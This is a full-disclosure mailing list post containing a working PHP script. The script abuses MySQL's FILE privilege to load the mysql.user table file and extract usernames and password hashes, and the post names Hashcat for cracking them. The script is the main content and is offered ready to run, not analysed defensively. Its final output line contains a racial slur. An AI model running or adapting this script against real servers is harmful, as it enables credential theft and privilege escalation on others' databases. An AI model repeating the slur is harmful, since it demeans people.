[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] MySQL (Linux) Database Privilege Elevation Zeroday Exploit



Hi all,

wrote some shitcode for mysql user&hash enumeration when having FILE privilege. surely you could do it with simple bash one-liner using mysql+grep+sed, but we're not going the easy way, right?

the first thought was "hey, what about changing root password directly in file user.MYD?" but then...
file_name cannot be an existing file, which among other things prevents files such as /etc/passwd and database tables from being destroyed.

anyway we have Nvidia cards and Hashcat.


Cheers,

Kai
<?php
// Ã?¿Ã?µÃ?¹Ã?Ã?°Ã?»i Ã?²Ã?eÃ?â?? Ã?´Ã?¾Ã?¼Ã?°Ã?³Ã?¾Ã?â??
$host="localhost"; 
$port="3306";
$db="loltest"; # db for loading file contents. $user must have privileges to 
write in it:
## mysql -u root -p
## create database loltest;
## create user "loltest"@"localhost" identified by "asdasdasdasd";
## grant all privileges on loltest.* to "loltest"@"localhost";
## grant FILE on *.* to "loltest"@"localhost";
## flush privileges;
$user="loltest"; # user with FILE privilege
$pass="asdasdasdasd";
$file="/var/lib/mysql/mysql/user.MYD"; # change to correct path if it differs
echo "-> connecting.. ";
$link=mysql_connect("".$host.":".$port."",$user,$pass) or die("cant connect: 
".mysql_error()."\n");
echo "OK\n-> trying to select `mysql` db.. ";
$rez=mysql_select_db("mysql");
if (!$rez) {
 echo "OK, \$user $user has no access to `mysql`, proceeding..\n";
} else {
 echo "\$user $user has access to `mysql`!\n"; # so why do you need this 
"exploit"?
 die(11);
}
echo "-> selecting db.. ";
mysql_select_db($db) or die ("cannot select db: ".mysql_error()."\n");
echo "OK\n-> trying to drop old table.. ";
$rez=mysql_query("DROP TABLE file;");
if (!$rez) { echo "cannot drop table: ".mysql_error()."\n"; }
echo "OK\n-> creating table.. ";
mysql_query("CREATE TABLE `file` ( `text` LONGBLOB NOT NULL );") or die 
("cannot create table: ".mysql_error()."\n");
echo "OK\n-> reading file $file.. ";
mysql_query('LOAD DATA INFILE "'.$file.'" INTO TABLE file LINES TERMINATED BY 
"" (`text`);') or die ("cannot load data: ".mysql_error()."\n");
$rez=mysql_query("SELECT * FROM file;");
if (!$rez) { echo "fail. no FILE permission?\n"; }
else {
 for ($i=0;$i<mysql_num_fields($rez);$i++) {$name = mysql_field_name($rez,$i);}
 $data="";
 while ($row = mysql_fetch_array($rez, MYSQL_ASSOC)) {$data .= join 
("\r\n",$row);}
 if (empty($data)) {
  echo "file does not exists or empty?\n";
 } else {
  echo "OK\n-> result:\n";
  $hex = "";
  $plain = "";
  for ($i=0; $i<strlen($data); $i++) {
   $hex .= sprintf("%02X",ord($data[$i]))." ";
  }
 } 
 mysql_free_result($rez);
 mysql_query("DROP TABLE file;") or die("cannot drop table: 
".mysql_error()."\n");
}
#echo " ------------- hex -------------\n".$hex."\n"; #debug
$plain=array();
preg_match_all("/FB 0F F. (.*?) 0(1|2) /s", $hex, $onlygood); # FB 0F F. = 
mysql row delimiter (?)
foreach ($onlygood[1] as $string) {
 $temp="";
 $charz=explode(" ",$string);
 foreach ($charz as $char) {
  switch ($char) {
   case "01": $temp .= ""; break;
   case "03": $temp .= " "; break;
   case "04": $temp .= " "; break;
   case "05": $temp .= " "; break;
   case "06": $temp .= " "; break;
   case "07": $temp .= " "; break;
   case "08": $temp .= " "; break;
   case "09": $temp .= " "; break;
   case "0A": $temp .= " "; break;
   case "0B": $temp .= " "; break;
   case "0C": $temp .= " "; break;
   case "0D": $temp .= " "; break;
   case "0E": $temp .= " "; break;
   case "0F": $temp .= " "; break;
   case "1A": $temp .= ""; break;                                               
   case "2A": $temp .= " *"; break;
   default: $temp .= chr(hexdec($char));
  }
 }
 $plain[]=$temp;
}
echo " ------------- plain users -------------\n";
foreach ($plain as $lol) {
 echo $lol."\n";
}
mysql_close($link);
echo "\nbl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n";
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/